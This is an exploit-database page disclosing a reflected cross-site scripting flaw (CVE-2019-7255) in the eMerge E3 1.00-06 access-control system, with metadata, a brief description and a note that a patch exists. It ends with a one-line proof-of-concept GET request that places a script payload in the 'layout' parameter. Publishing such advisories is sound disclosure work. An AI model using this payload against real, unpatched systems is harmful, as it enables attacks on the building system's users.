header-logo
Suggest Exploit
vendor:
eMerge E3
by:
LiquidWorm
6.1
CVSS
MEDIUM
Reflected Cross-Site Scripting
79
CWE
Product Name: eMerge E3
Affected Version From: 1.00-06
Affected Version To: 1.00-06
Patch Exists: Yes
Related CWE: CVE-2019-7255
CPE: a:linear_solutions:emerge_e3:1.00-06
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: NA
2018

eMerge E3 1.00-06 – ‘layout’ Reflected Cross-Site Scripting

eMerge E3 1.00-06 is vulnerable to Reflected Cross-Site Scripting (XSS) when the 'layout' parameter is supplied with malicious JavaScript code. An attacker can exploit this vulnerability by tricking an authenticated user into clicking a malicious link. The malicious link contains the malicious JavaScript code in the 'layout' parameter. When the user clicks the link, the malicious code is executed in the user's browser.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update to the latest version of the software.
Source

Exploit-DB raw data:

# Exploit Title: eMerge E3 1.00-06 - 'layout' Reflected Cross-Site Scripting
# Google Dork: NA
# Date: 2018-11-11
# Exploit Author: LiquidWorm
# Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/
# Software Link: http://linear-solutions.com/nsc_family/e3-series/
# Version: 1.00-06
# Tested on: NA
# CVE : CVE-2019-7255
# Advisory: https://applied-risk.com/resources/ar-2019-009
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
# Advisory: https://applied-risk.com/resources/ar-2019-005

# PoC:
GET /badging/badge_template_v0.php?layout=<script>confirm('XSS')</script> HTTP/1.1

Navigation

Suggest Exploit

Services By CQR